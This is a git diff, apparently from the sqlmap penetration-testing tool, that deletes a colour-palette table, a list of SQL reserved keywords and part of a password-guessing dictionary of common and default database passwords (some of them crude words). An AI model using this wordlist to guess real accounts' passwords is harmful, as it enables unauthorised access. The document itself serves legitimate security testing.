247, 188), (254, 227, 145), (254, 196, 79), (254, 153, 41), (236, 112, 20), (204, 76, 2), (140, 45, 4)], - 'ylorbr9': [(255, 255, 229), (255, 247, 188), (254, 227, 145), (254, 196, 79), (254, 153, 41), (236, 112, 20), (204, 76, 2), (153, 52, 4), (102, 37, 6)], - 'ylorrd3': [(255, 237, 160), (254, 178, 76), (240, 59, 32)], - 'ylorrd4': [(255, 255, 178), (254, 204, 92), (253, 141, 60), (227, 26, 28)], - 'ylorrd5': [(255, 255, 178), (254, 204, 92), (253, 141, 60), (240, 59, 32), (189, 0, 38)], - 'ylorrd6': [(255, 255, 178), (254, 217, 118), (254, 178, 76), (253, 141, 60), (240, 59, 32), (189, 0, 38)], - 'ylorrd7': [(255, 255, 178), (254, 217, 118), (254, 178, 76), (253, 141, 60), (252, 78, 42), (227, 26, 28), (177, 0, 38)], - 'ylorrd8': [(255, 255, 204), (255, 237, 160), (254, 217, 118), (254, 178, 76), (253, 141, 60), (252, 78, 42), (227, 26, 28), (177, 0, 38)], -} - - -if __name__ == '__main__': - main() diff --git a/txt/keywords.txt b/txt/keywords.txt deleted file mode 100644 index 432746afd76..00000000000 --- a/txt/keywords.txt +++ /dev/null @@ -1,453 +0,0 @@ -# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -# See the file 'doc/COPYING' for copying permission - -# SQL-92 keywords (reference: http://developer.mimer.com/validator/sql-reserved-words.tml) - -ABSOLUTE -ACTION -ADD -ALL -ALLOCATE -ALTER -AND -ANY -ARE -AS -ASC -ASSERTION -AT -AUTHORIZATION -AVG -BEGIN -BETWEEN -BIT -BIT_LENGTH -BOTH -BY -CALL -CASCADE -CASCADED -CASE -CAST -CATALOG -CHAR -CHAR_LENGTH -CHARACTER -CHARACTER_LENGTH -CHECK -CLOSE -COALESCE -COLLATE -COLLATION -COLUMN -COMMIT -CONDITION -CONNECT -CONNECTION -CONSTRAINT -CONSTRAINTS -CONTAINS -CONTINUE -CONVERT -CORRESPONDING -COUNT -CREATE -CROSS -CURRENT -CURRENT_DATE -CURRENT_PATH -CURRENT_TIME -CURRENT_TIMESTAMP -CURRENT_USER -CURSOR -DATE -DAY -DEALLOCATE -DEC -DECIMAL -DECLARE -DEFAULT -DEFERRABLE -DEFERRED -DELETE -DESC -DESCRIBE -DESCRIPTOR -DETERMINISTIC -DIAGNOSTICS -DISCONNECT -DISTINCT -DO -DOMAIN -DOUBLE -DROP -ELSE -ELSEIF -END -ESCAPE -EXCEPT -EXCEPTION -EXEC -EXECUTE -EXISTS -EXIT -EXTERNAL -EXTRACT -FALSE -FETCH -FIRST -FLOAT -FOR -FOREIGN -FOUND -FROM -FULL -FUNCTION -GET -GLOBAL -GO -GOTO -GRANT -GROUP -HANDLER -HAVING -HOUR -IDENTITY -IF -IMMEDIATE -IN -INDICATOR -INITIALLY -INNER -INOUT -INPUT -INSENSITIVE -INSERT -INT -INTEGER -INTERSECT -INTERVAL -INTO -IS -ISOLATION -JOIN -KEY -LANGUAGE -LAST -LEADING -LEAVE -LEFT -LEVEL -LIKE -LOCAL -LOOP -LOWER -MATCH -MAX -MIN -MINUTE -MODULE -MONTH -NAMES -NATIONAL -NATURAL -NCHAR -NEXT -NO -NOT -NULL -NULLIF -NUMERIC -OCTET_LENGTH -OF -ON -ONLY -OPEN -OPTION -OR -ORDER -OUT -OUTER -OUTPUT -OVERLAPS -PAD -PARAMETER -PARTIAL -PATH -POSITION -PRECISION -PREPARE -PRESERVE -PRIMARY -PRIOR -PRIVILEGES -PROCEDURE -PUBLIC -READ -REAL -REFERENCES -RELATIVE -REPEAT -RESIGNAL -RESTRICT -RETURN -RETURNS -REVOKE -RIGHT -ROLLBACK -ROUTINE -ROWS -SCHEMA -SCROLL -SECOND -SECTION -SELECT -SESSION -SESSION_USER -SET -SIGNAL -SIZE -SMALLINT -SOME -SPACE -SPECIFIC -SQL -SQLCODE -SQLERROR -SQLEXCEPTION -SQLSTATE -SQLWARNING -SUBSTRING -SUM -SYSTEM_USER -TABLE -TEMPORARY -THEN -TIME -TIMESTAMP -TIMEZONE_HOUR -TIMEZONE_MINUTE -TO -TRAILING -TRANSACTION -TRANSLATE -TRANSLATION -TRIM -TRUE -UNDO -UNION -UNIQUE -UNKNOWN -UNTIL -UPDATE -UPPER -USAGE -USER -USING -VALUE -VALUES -VARCHAR -VARYING -VIEW -WHEN -WHENEVER -WHERE -WHILE -WITH -WORK -WRITE -YEAR -ZONE - -# MySQL 5.0 keywords (reference: http://dev.mysql.com/doc/refman/5.0/en/reserved-words.html) -ADD -ALL -ALTER -ANALYZE -AND -ASASC -ASENSITIVE -BEFORE -BETWEEN -BIGINT -BINARYBLOB -BOTH -BY -CALL -CASCADE -CASECHANGE -CAST -CHAR -CHARACTER -CHECK -COLLATE -COLUMN -CONCAT -CONDITIONCONSTRAINT -CONTINUE -CONVERT -CREATE -CROSS -CURRENT_DATE -CURRENT_TIMECURRENT_TIMESTAMP -CURRENT_USER -CURSOR -DATABASE -DATABASES -DAY_HOUR -DAY_MICROSECONDDAY_MINUTE -DAY_SECOND -DEC -DECIMAL -DECLARE -DEFAULTDELAYED -DELETE -DESC -DESCRIBE -DETERMINISTIC -DISTINCTDISTINCTROW -DIV -DOUBLE -DROP -DUAL -EACH -ELSEELSEIF -ENCLOSED -ESCAPED -EXISTS -EXIT -EXPLAIN -FALSEFETCH -FLOAT -FLOAT4 -FLOAT8 -FOR -FORCE -FOREIGNFROM -FULLTEXT -GRANT -GROUP -HAVING -HIGH_PRIORITYHOUR_MICROSECOND -HOUR_MINUTE -HOUR_SECOND -IF -IFNULL -IGNORE -ININDEX -INFILE -INNER -INOUT -INSENSITIVE -INSERT -INTINT1 -INT2 -INT3 -INT4 -INT8 -INTEGER -INTERVALINTO -IS -ISNULL -ITERATE -JOIN -KEY -KEYS -KILLLEADING -LEAVE -LEFT -LIKE -LIMIT -LINESLOAD -LOCALTIME -LOCALTIMESTAMP -LOCK -LONG -LONGBLOBLONGTEXT -LOOP -LOW_PRIORITY -MATCH -MEDIUMBLOB -MEDIUMINT -MEDIUMTEXTMIDDLEINT -MINUTE_MICROSECOND -MINUTE_SECOND -MOD -MODIFIES -NATURAL -NOTNO_WRITE_TO_BINLOG -NULL -NUMERIC -ON -OPTIMIZE -OPTION -OPTIONALLYOR -ORDER -OUT -OUTER -OUTFILE -PRECISIONPRIMARY -PROCEDURE -PURGE -READ -READS -REALREFERENCES -REGEXP -RELEASE -RENAME -REPEAT -REPLACE -REQUIRERESTRICT -RETURN -REVOKE -RIGHT -RLIKE -SCHEMA -SCHEMASSECOND_MICROSECOND -SELECT -SENSITIVE -SEPARATOR -SET -SHOW -SMALLINTSONAME -SPATIAL -SPECIFIC -SQL -SQLEXCEPTION -SQLSTATESQLWARNING -SQL_BIG_RESULT -SQL_CALC_FOUND_ROWS -SQL_SMALL_RESULT -SSL -STARTINGSTRAIGHT_JOIN -TABLE -TERMINATED -THEN -TINYBLOB -TINYINT -TINYTEXTTO -TRAILING -TRIGGER -TRUE -UNDO -UNION -UNIQUEUNLOCK -UNSIGNED -UPDATE -USAGE -USE -USING -UTC_DATEUTC_TIME -UTC_TIMESTAMP -VALUES -VARBINARY -VARCHAR -VARCHARACTERVARYING -VERSION -WHEN -WHERE -WHILE -WITH -WRITEXOR -YEAR_MONTH -ZEROFILL diff --git a/txt/smalldict.txt b/txt/smalldict.txt deleted file mode 100644 index 766f506280c..00000000000 --- a/txt/smalldict.txt +++ /dev/null @@ -1,3567 +0,0 @@ -!@#$%^&* -!@#$%^& -!@#$%^ -!@#$% -@#$%^& -* -000000 -00000000 -0007 -007 -007007 -06071992 -0racl3 -0racl38 -0racl38i -0racl39 -0racl39i -0racle -0racle8 -0racle8i -0racle9 -0racle9i -1 -1022 -10sne1 -1111 -11111 -111111 -11111111 -1212 -121212 -1213 -1214 -1225 -123 -123123 -123321 -1234 -12345 -123456 -1234567 -12345678 -1234qwer -123abc -123go -1313 -131313 -1316 -1332 -13579 -1412 -1430 -1701d -171717 -1818 -181818 -1911 -1928 -1948 -1950 -1952 -1953 -1955 -1956 -1960 -1964 -1969 -1973 -1975 -1977 -1978 -1991 -199220706 -1996 -1a2b3c -1chris -1kitty -1p2o3i -1q2w3e -1qw23e -2000 -2001 -2020 -2112 -21122112 -22 -2200 -2222 -2252 -2kids -3010 -3112 -3141 -333 -3533 -369 -3bears -4055 -4444 -4788 -4854 -4runner -5050 -5121 -5252 -54321 -5555 -55555 -5683 -57chevy -6262 -6301 -654321 -666666 -6969 -696969 -777 -7777 -7777777 -789456 -7dwarfs -80486 -8675309 -888888 -88888888 -90210 -911 -99999999 -a -a12345 -a1b2c3 -a1b2c3d4 -aa -aaa -aaaa -aaaaaa -aardvark -aaron -abacab -abbott -abby -abc -abc123 -ABC123 -abcd -abcd123 -abcd1234 -abcde -abcdef -Abcdef -abcdefg -Abcdefg -abigail -abm -absolut -access -accord -account -ace -acropolis -action -active -acura -adam -adg -adgangskode -adi -adidas -adldemo -admin -admin1 -administrator -adrian -adrock -advil -aerobics -africa -agent -ahl -ahm -airborne -airoplane -airwolf -ak -akf7d98s2 -aki123 -alaska -albert -alex -alex1 -alexander -alexandr -alexis -Alexis -alfaro -alfred -ali -alice -alice1 -alicia -alien -aliens -alina -aline -alison -allegro -allen -allison -allo -allstate -aloha -alpha -Alpha -alpha1 -alpine -alr -altamira -althea -altima -altima1 -amanda -amanda1 -amazing -amber -amelie -america -amour -ams -amv -amy -anaconda -anders -anderson -andre -andre1 -andrea -andrea1 -andrew! -andrew -Andrew -andrew1 -andromed -andy -angel -angel1 -angela -angels -angie -angie1 -angus -animal -Animals -anita -ann -anna -anne -anneli -annette -annie -anonymous -antares -anthony -Anthony -anything -ap -apache -apollo -apollo13 -apple -apple1 -apple2 -applepie -apples -applmgr -applsys -applsyspub -apppassword -apps -april -aptiva -aq -aqdemo -aqjava -aqua -aquarius -aquser -ar -aragorn -archie -ariane -ariel -Ariel -arizona -arlene -arnold -arrow -arsenal -artemis -arthur -artist -asdf -asdf1234 -asdfasdf -asdfg -asdfgh -Asdfgh -asdfghjk -asdfjkl; -asdfjkl -asdf;lkj -asf -asg -ashley -ashley1 -ashraf -ashton -asl -aso -asp -aspen -ass -asshole -assmunch -ast -asterix -ath -athena -attila -audiouser -august -austin -autumn -avalon -avatar -avenger -avenir -awesome -ax -ayelet -aylmer -az -babes -baby -babydoll -babylon5 -bach -backup -badger -bailey -Bailey -bambi -bamboo -banana -bandit -bar -baraka -barbara -barbie -barn -barney -barney1 -barnyard -barrett -barry -bart -bartman -baseball -basf -basil -basket -basketball -bass -Bastard -batman -batman1 -bball -bc4j -beaches -beagle -beaner -beanie -beans -bear -bears -beast -beasty -beatles -beatrice -beautiful -beauty -beaver -beavis -Beavis -beavis1 -bebe -becca -beer -belgium -belize -bella -belle -belmont -ben -benjamin -benji -benny -benoit -benson -beowulf -bernard -bernardo -bernie -berry -bertha -beryl -best -beta -betacam -betsy -betty -bharat -bic -bichon -bigal -bigben -bigbird -bigboss -bigdog -biggles -bigmac -bigman -bigred -biker -bil -bilbo -bill -bills -billy -billy1 -bim -bimmer -bingo -binky -bioboy -biochem -biology -bird -bird33 -birdie -birdy -birthday -bis -biscuit -bishop -Bismillah -bitch -biteme -bitter -biv -bix -biz -black -blackjack -blah -blanche -blazer -blewis -blinds -bliss -blitz -blizzard -blonde -blondie -blood -blowfish -blowjob -blowme -blue -bluebird -blueeyes -bluefish -bluejean -blues -bluesky -bmw -boat -bob -bobby -bobcat -bogart -bogey -bogus -bom -bombay -bond007 -Bond007 -bonjour -bonnie -Bonzo -boobie -booboo -Booboo -booger -boogie -boomer -booster -boots -bootsie -boris -bosco -boss -BOSS -boston -Boston -boulder -bourbon -boxer -boxers -bozo -bradley -brain -branch -brandi -brandon -brandy -braves -brazil -brenda -brent -brewster -brian -bridge -bridges -bright -brio_admin -britain -Broadway -broker -bronco -bronte -brooke -brother -bruce -bruno -brutus -bryan -bsc -bubba -bubba1 -bubble -bubbles -buck -bucks -buddha -buddy -budgie -buffalo -buffett -buffy -bug_reports -bugs -bugsy -bull -bulldog -bullet -bulls -bullshit -bunny -burns -burton -business -buster -butch -butler -butter -butterfly -butthead -button -buttons -buzz -byron -byteme -c00per -cactus -caesar -caitlin -calendar -calgary -california -calvin -calvin1 -camaro -camay -camel -camera -camille -campbell -camping -canada -cancer -candy -canela -cannon -cannondale -canon -Canucks -captain -car -carbon -cardinal -Cardinal -carebear -carl -carlos -carmen -carnage -carol -Carol -carol1 -carole -carolina -caroline -carolyn -carrie -carrot -cascade -casey -Casio -casper -cassie -castle -cat -catalina -catalog -catch22 -catfish -catherine -cathy -catnip -cats -catwoman -cccccc -cct -cdemo82 -cdemo83 -cdemocor -cdemorid -cdemoucb -cdouglas -ce -cecile -cedic -celica -celine -Celtics -cement -center -centra -central -cesar -cessna -chad -chainsaw -challenge -chameleon -champion -Champs -chance -chandler -chanel -chang -change -changeit -changeme -Changeme -ChangeMe -change_on_install -chantal -chaos -chapman -charger -charity -charles -charlie -Charlie -charlie1 -charlotte -chat -cheese -chelsea -chelsea1 -cherry -cheryl -chess -chester1 -chevy -chiara -chicago -chicken -chico -chiefs -china -chinacat -chinook -chip -chiquita -chloe -chocolat -chocolate -chouette -chris -Chris -chris1 -chris123 -christ1 -christia -christian -christin -christmas -christoph -christopher -christy -chronos -chuck -church -cicero -cids -cinder -cindy -cindy1 -cinema -circuit -cirque -cirrus -cis -cisinfo -civic -civil -claire -clancy -clapton -clark -clarkson -class -classroom -claude -claudel -claudia -clave -cleo -clerk -cliff -clipper -clock -cloclo -cloth -clueless -cn -cobain -cobra -cocacola -coco -cody -coffee -coke -colette -colleen -college -color -colorado -colors -colt45 -coltrane -columbia -comet -commander -company -compaq -compiere -compton -computer -Computer -concept -concorde -confused -connect -connie -conrad -content -control -cook -cookie -cookies -cooking -cool -coolbean -cooper -cooter -copper -cora -cordelia -corky -cornflake -corona -corrado -corvette -corwin -cosmo -cosmos -cougar -Cougar -cougars -country -courier -courtney -cowboy -cowboys -cows -coyote -crack1 -cracker -craig -crawford -creative -Creative -crescent -cricket -cross -crow -crowley -crp -cruise -crusader -crystal -cs -csc -csd -cse -csf -csi -csl -csmig -csp -csr -css -cthulhu -ctxdemo -ctxsys -cua -cuda -cuddles -cue -cuervo -cuf -cug -cui -cun -cunningham -cunt -cup -cupcake -current -curtis -Curtis -cus -cutie -cutlass -cyber -cyclone -cynthia -cyrano -cz -daddy -daedalus -dagger -dagger1 -daily -daisie -daisy -dakota -dale -dallas -dammit -damogran -dan -dana -dance -dancer -daniel -Daniel -daniel1 -danielle -danny -daphne -dark1 -Darkman -darkstar -darren -darryl -darwin -dasha -data1 -database -datatrain -dave -david -david1 -davids -dawn -daytek -dbsnmp -dbvision -dead -deadhead -dean -death -debbie -deborah -december -decker -deedee -deeznuts -def -delano -delete -deliver -delta -demo -demo8 -demo9 -demon -denali -denis -denise -Denise -dennis -denny -depeche -derek -des -des2k -desert -design -deskjet -destiny -detroit -deutsch -dev2000_demos -devil -devine -devon -dexter -dharma -diablo -diamond -diana -diane -dianne -dickens -dickhead -diesel -digger -digital -dilbert -dillweed -dim -dip -dipper -director -dirk -disco -discoverer_admin -disney -dixie -dixon -dmsys -doc -doctor -dodger -dodgers -dog -dogbert -doggy -doitnow -dollar -dollars -dolly -dolphin -dolphins -dominic -dominique -domino -don -donald -donkey -donna -dontknow -doogie -dookie -doom -doom2 -doors -dork -dorothy -doudou -doug -dougie -douglas -downtown -dpfpass -draft -dragon -Dragon -dragon1 -dragonfly -dreamer -dreams -driver -dsgateway -dssys -d_syspw -d_systpw -dtsp -duck -duckie -dude -dudley -duke -dumbass -dundee -dusty -dutch -dutchess -dwight -dylan -e -eaa -eagle -eagle1 -eagles -Eagles -eam -east -easter -eastern -ec -eclipse -ecx -eddie -edith -edmund -edward -eeyore -effie -eieio -eight -einstein -ejb -ejsadmin -ejsadmin_password -electric -element -elephant -elina1 -elissa -elizabeth -Elizabeth -ella -ellen -elliot -elsie -elvis -e-mail -emerald -emily -emmitt -emp -empire -energy -eng -engage -eni -enigma -enter -enterprise -entropy -eric -eric1 -erin -ernie1 -escort -escort1 -estelle -Esther -estore -etoile -eugene -europe -evelyn -event -evm -example -excalibur -excel -exfsys -explore -explorer -export -express -extdemo -extdemo2 -eyal -fa -faculty -fairview -faith -falcon -family -Family -family1 -farmer -farout -farside -fatboy -faust -fearless -feedback -felipe -felix -fem -fender -fenris -ferguson -ferrari -ferret -ferris -fiction -fidel -Figaro -fii -finance -finprod -fiona -fire -fireball -firebird -fireman -firenze -first -fish -fish1 -fisher -Fisher -fishes -fishhead -fishie -fishing -Fishing -flamingo -flanders -flash -fletch -fletcher -fleurs -flight -flip -flipper -flm -florida -florida1 -flower -flowerpot -flowers -floyd -fluffy -flute -fly -flyboy -flyer -fnd -fndpub -foobar -fool -football -ford -forest -Fortune -forward -foster -fountain -fox -foxtrot -fozzie -fpt -france -francesco -francine -francis -francois -frank -franka -franklin -freak1 -fred -freddie -freddy -Freddy -frederic -free -freebird -freedom -freeman -french -french1 -friday -Friday -friend -friends -Friends -frisco -fritz -frm -frodo -frog -froggie -froggies -froggy -frogs -front242 -Front242 -frontier -fte -fubar -fucker -fuckface -fuckme -fuckoff -fucku -fuckyou -Fuckyou -FuckYou -fugazi -fun -funguy -funtime -future -fuzz -fv -gabby -gabriel -gabriell -gaby -gaelic -galaxy -galileo -gambit -gambler -games -gammaphi -gandalf -Gandalf -garcia -garden -garfield -garfunkel -gargoyle -garlic -garnet -garth -gary -gasman -gaston -gateway -gateway2 -gator -gator1 -gemini -general -genesis -genius -george -george1 -georgia -gerald -german -germany -germany1 -Geronimo -getout -ggeorge -ghost -giants -gibbons -gibson -gigi -gilbert -gilgamesh -gilles -ginger -Gingers -giselle -gizmo -Gizmo -gl -glenn -glider1 -global -gma -gmd -gme -gmf -gmi -gml -gmoney -gmp -gms -go -goat -goaway -goblin -goblue -gocougs -godiva -godzilla -goethe -gofish -goforit -gold -golden -Golden -goldfish -golf -golfer -gollum -gone -goober -Goober -good -good-luck -goodluck -goofy -goose -gopher -gordon -gpfd -gpld -gr -grace -graham -gramps -grandma -grant -graphic -grateful -gravis -gray -graymail -greed -green -greenday -greg -greg1 -gregory -gremlin -greta -gretchen -Gretel -gretzky -grizzly -groovy -grover -grumpy -guess -guest -guido -guinness -guitar -guitar1 -gumby -gunner -gustavo -h2opolo -hacker -Hacker -hades -haggis -haha -hailey -hal -hal9000 -halloween -hallowell -hamid -hamilton -hamlet -hammer -Hammer -hank -hanna -hannah -hansolo -hanson -happy -happy1 -happy123 -happyday -hardcore -harley -Harley -HARLEY -harley1 -haro -harold -harriet -harris -harrison -harry -harvard -harvey -hawk -hawkeye -hawkeye1 -hazel -hcpark -health -health1 -heart -heather -Heather -heather1 -heather2 -heaven -hector -hedgehog -heidi -heikki -helen -helena -helene -hell -hello -Hello -hello1 -hello123 -hello8 -hellohello -help -help123 -helper -helpme -hendrix -Hendrix -henry -Henry -herbert -herman -hermes -Hershey -herzog -heythere -highland -hilbert -hilda -hillary -histoire -history -hithere -hitler -hlw -hobbes -hobbit -hockey -hola -holiday -holly -home -homebrew -homer -Homer -homerj -honda -honda1 -honey -hongkong -hoops -hoosier -hootie -hope -horizon -hornet -horse -horses -hosehead -hotdog -hotrod -house -houston -howard -hr -hri -huang -hudson -huey -hugh -hugo -hummer -hunter -huskies -hvst -hxc -hxt -hydrogen -i -ib6ub9 -iba -ibanez -ibe -ibp -ibu -iby -icdbown -icecream -iceman -icx -idemo_user -idiot -idontknow -ieb -iec -iem -ieo -ies -ieu -iex -if6was9 -iforget -ifssys -igc -igf -igi -igs -iguana -igw -ilmari -iloveu -iloveyou -image -imageuser -imagine -imc -imedia -impact -impala -imt -indian -indiana -indigo -indonesia -info -informix -ingvar -insane -inside -insight -instance -instruct -integra -integral -intern -internet -Internet -intrepid -inv -invalid -invalid password -iomega -ipa -ipd -iplanet -ireland -irene -irina -iris -irish -irmeli -ironman -isaac -isabel -isabelle -isc -island -israel -italia -italy -itg -izzy -j0ker -j1l2t3 -ja -jack -jackie -jackie1 -jackson -Jackson -jacob -jaguar -jake -jakey -jamaica -james -james1 -jamesbond -jamie -jamjam -jan -jane -Janet -janice -japan -jared -jasmin -jasmine -jason -jason1 -jasper -jazz -je -jean -jeanette -jeanne -Jeanne -jedi -jeepster -jeff -jeffrey -jeffrey1 -jenifer -jenni -jennie -jennifer -Jennifer -jenny -jenny1 -jensen -jer -jeremy -jerry -Jersey -jesse -jesse1 -jessica -Jessica -jessie -jester -jesus -jesus1 -jethro -jethrotull -jetspeed -jetta1 -jewels -jg -jim -jimbo -jimbob -jimi -jimmy -jkl123 -jkm -jl -jmuser -joanie -joanna -Joanna -joe -joel -joelle -joey -johan -johanna1 -john -john316 -johnny -johnson -Johnson -jojo -joker -joker1 -jonathan -jordan -Jordan -jordan23 -jordie -jorge -josee -joseph -josh -joshua -Joshua -josie -journey -joy -joyce -JSBach -jtf -jtm -jts -jubilee -judith -judy -juhani -jules -julia -julia2 -julian -julie -julie1 -julien -juliet -jumanji -jumbo -jump -junebug -junior -juniper -jupiter -jussi -justdoit -justice -justice4 -justin -justin1 -kalamazo -kali -kangaroo -karen -karen1 -karin -karine -karma -kat -kate -katerina -katherine -kathleen -kathy -katie -Katie -katie1 -kayla -kcin -keeper -keepout -keith -keith1 -keller -kelly -kelly1 -kelsey -kendall -kennedy -kenneth -kenny -kerala -kermit -kerrya -ketchup -kevin -kevin1 -khan -kidder -kids -killer -Killer -KILLER -kim -kimberly -king -kingdom -kingfish -kings -kirk -kissa2 -kissme -kitkat -kitten -Kitten -kitty -kittycat -kiwi -kkkkkk -kleenex -knicks -knight -Knight -koala -koko -kombat -kramer -kris -kristen -kristi -kristin -kristine -kwalker -l2ldemo -lab1 -labtec -lacrosse -laddie -lady -ladybug -lakers -lambda -lamer -lance -larry -larry1 -laser -laserjet -laskjdf098ksdaf09 -lassie1 -laura -laurel -lauren -laurie -law -lawrence -lawson -lawyer -lbacsys -leader -leaf -leblanc -ledzep -lee -legal -legend -leland -lemon -leo -leon -leonard -leslie -lestat -lester -letmein -letter -letters -lev -lexus1 -liberty -Liberty -libra -library -life -light -lights -lima -lincoln -linda -lindsay -Lindsay -lindsey -lionel -lionking -lions -lisa -lissabon -little -liverpool -liz -lizard -Lizard -lizzy -lloyd -logan -logger -logical -logos -loislane -loki -lola -lolita -london -lonely -lonestar -longer -longhorn -looney -loren -lori -lorna -lorraine -lorrie -loser -lost -lotus -lou -louis -louise -love -lovely -loveme -lovers -loveyou -lucas -lucia -lucifer -lucky -lucky1 -lucky14 -lucy -lulu -lynn -m -m1911a1 -mac -macha -macintosh -macross -macse30 -maddie -maddog -Madeline -madison -madmax -madoka -madonna -maggie -magic -magic1 -magnum -maiden -mail -mailer -mailman -maine -major -majordomo -makeitso -malcolm -malibu -mallard -manag3r -manageme -manager -manprod -manson -mantra -manuel -marathon -marc -marcel -marcus -margaret -Margaret -maria -maria1 -mariah -mariah1 -marie -marielle -marilyn -marina -marine -mariner -marino -mario -mariposa -mark -mark1 -market -marlboro -marley -mars -marshall -mart -martha -martin -martin1 -marty -marvin -mary -maryjane -master -Master -master1 -math -matrix -matt -matthew -Matthew -matti1 -mattingly -maurice -maverick -max -maxime -maxine -maxmax -maxwell -Maxwell -mayday -mazda1 -mddata -mddemo -mddemo_mgr -mdsys -me -meatloaf -mech -mechanic -media -medical -megan -meggie -meister -melanie -melina -melissa -Mellon -melody -memory -memphis -mensuck -meow -mercedes -mercer -mercury -merde -merlin -merlot -Merlot -mermaid -merrill -metal -metallic -Metallic -mexico -mfg -mgr -mgwuser -miami -michael -Michael -michael1 -michal -michel -Michel -Michel1 -michele -michelle -Michelle -michigan -michou -mickel -mickey -mickey1 -micro -microsoft -midnight -midori -midvale -midway -migrate -mikael -mike -mike1 -mikey -miki -milano -miles -millenium -miller -millie -million -mimi -mindy -mine -minnie -minou -miracle -mirage -miranda -miriam -mirror -misha -mishka -mission -missy -misty -mitch -mitchell -mmm -mmmmmm -mmo2 -mmo3 -mmouse -mobile -mobydick -modem -mojo -molly -molly1 -molson -mom -monday -Monday -monet -money -Money -money1 -monica -monique -monkey -monkey1 -monopoly -monroe -Monster -montana -montana3 -montreal -Montreal -montrose -monty -moocow -mookie -moomoo -moon -moonbeam -moore -moose -mopar -moreau -morecats -morgan -moroni -morpheus -morris -mort -mortimer -mot_de_passe -mother -motor -motorola -mountain -mouse -mouse1 -movies -mowgli -mozart -mrp -msc -msd -mso -msr -mt6ch5 -mtrpw -mts_password -mtssys -muffin -mulder -mulder1 -mumblefratz -munchkin -murphy -murray -muscle -music -mustang -mustang1 -mwa -mxagent -nadia -nadine -names -nancy -naomi -napoleon -nascar -nat -natasha -nathan -nation -national -nautica -ncc1701 -NCC1701 -ncc1701d -ncc1701e -ne1410s -ne1469 -ne14a69 -nebraska -neil -neko -nellie -nelson -nemesis -neotix_sys -nermal -nesbit -nesbitt -nestle -netware -network -neutrino -new -newaccount -newcourt -newlife -newpass -news -newton -Newton -newuser -newyork -newyork1 -nexus6 -nguyen -nicarao -nicholas -Nicholas -nichole -nick -nicklaus -nicole -nigel -nightshadow -nightwind -nike -niki -nikita -nikki -nimrod -nina -niners -nintendo -nirvana -nirvana1 -nissan -nisse -nite -nneulpass -nokia -nomore -none -none1 -nopass -Noriko -normal -norman -norton -notebook -nothing -notta1 -notused -nouveau -novell -noway -nugget -number9 -numbers -nurse -nutmeg -oas_public -oatmeal -oaxaca -obiwan -obsession -ocean -ocitest -ocm_db_admin -october -October -odm -ods -odscommon -ods_server -oe -oemadm -oemrep -oem_temp -ohshit -oicu812 -okb -okc -oke -oki -oko -okr -oks -okx -olapdba -olapsvr -olapsys -olive -oliver -olivia -olivier -ollie -olsen -omega -one -online -ont -oo -open -openspirit -openup -opera -opi -opus -oracache -oracl3 -oracle -oracle8 -oracle8i -oracle9 -oracle9i -oradbapass -orange -oranges -oraprobe -oraregsys -orasso -orasso_ds -orasso_pa -orasso_ps -orasso_public -orastat -orchid -ordcommon -ordplugins -ordsys -oregon -oreo -orion -orlando -orville -oscar -osm -osp22 -ota -otter -ou812 -OU812 -outln -overkill -owa -owa_public -owf_mgr -owner -oxford -ozf -ozp -ozs -ozzy -pa -paagal -pacers -pacific -packard -packer -packers -packrat -paint -painter -Paladin -paloma -pam -pamela -Pamela -panama -pancake -panda -pandora -panic -pantera -panther -papa -paper -paradigm -paris -park -parker -parol -parola -parrot -partner -pascal -pass -passion -passwd -passwo1 -passwo2 -passwo3 -passwo4 -password -Password -pat -patches -patricia -patrick -patriots -patrol -patton -paul -paula -pauline -pavel -payton -peace -peach -peaches -Peaches -peanut -peanuts -Peanuts -pearl -pearljam -pedro -pedro1 -peewee -peggy -pekka -pencil -penelope -penguin -penny -pentium -Pentium -people -pepper -Pepper -pepsi -percy -perfect -performa -perfstat -perry -person -perstat -pete -peter -Peter -peter1 -peterk -peterpan -petey -petunia -phantom -phialpha -phil -philip -philips -phillips -phish -phishy -phoenix -Phoenix -phoenix1 -phone -photo -piano -piano1 -pianoman -pianos -picard -picasso -pickle -picture -pierce -pierre -pigeon -piglet -Piglet -pink -pinkfloyd -pioneer -pipeline -piper1 -pirate -pisces -pit -pizza -pjm -planet -planning -plato -play -playboy -player -players -please -plex -plus -pluto -pm -pmi -pn -po -po7 -po8 -poa -poetic -poetry -poiuyt -polar -polaris -pole -police -politics -polo -pom -pomme -pontiac -poohbear -pookey -pookie -Pookie -pookie1 -popcorn -pope -popeye -poppy -porsche -porsche911 -portal30 -portal30_admin -portal30_demo -portal30_ps -portal30_public -portal30_sso -portal30_sso_admin -portal30_sso_ps -portal30_sso_public -portal31 -portal_demo -portal_sso_ps -porter -portland -pos -power -powercartuser -ppp -PPP -praise -prayer -precious -predator -prelude -premier -preston -primary -primus -prince -princess -Princess -print -printing -prof -prometheus -property -protel -provider -psa -psalms -psb -psp -psycho -pub -public -pubsub -pubsub1 -puddin -pulsar -pumpkin -punkin -puppy -purple -Purple -pussy -pussy1 -pv -pyramid -pyro -python -q1w2e3 -qa -qdba -qp -qqq111 -qs -qs_adm -qs_cb -qs_cbadm -qs_cs -qs_es -qs_os -qs_ws -quality -quebec -queen -queenie -quentin -quest -qwaszx -qwer -qwert -Qwert -qwerty -Qwerty -qwerty12 -qwertyui -r0ger -rabbit -Rabbit -rabbit1 -racer -racerx -rachel -rachelle -racoon -radar -radio -rafiki -raiders -Raiders -rain -rainbow -Raistlin -raleigh -ralph -ram -rambo -rambo1 -rancid -random -Random -randy -randy1 -ranger -rangers -raptor -raquel -rascal -rasta1 -rastafarian -ratio -raven -ravens -raymond -re -reality -rebecca -Rebecca -red -redcloud -reddog -redfish -redman -redrum -redskins -redwing -redwood -reed -reggae -reggie -reliant -remember -remote -rene -renee -renegade -repadmin -reports -rep_owner -reptile -republic -rescue -research -revolution -rex -reynolds -reznor -rg -rhino -rhjrjlbk -rhonda -rhx -ricardo -ricardo1 -richard -richard1 -richards -richmond -ricky -riley -ripper -ripple -rita -river -rla -rlm -rmail -rman -roadrunner -rob -robbie -robby -robert -Robert -robert1 -roberts -robin -robinhood -robocop -robotech -robotics -roche -rock -rocket -rocket1 -rockie -rocknroll -rockon -rocky -rocky1 -rodeo -roger -roger1 -rogers -roland -rolex -roman -rommel -ronald -roni -rookie -rootbeer -rose -rosebud -roses -rosie -rossigno -rouge -route66 -roxy -roy -royal -rrs -ruby -rufus -rugby -rugger -runner -running -rush -russell -Russell -rusty -ruth -ruthie -ruthless -ryan -sabbath -sabina -sabrina -sadie -safety -safety1 -saigon -sailing -sailor 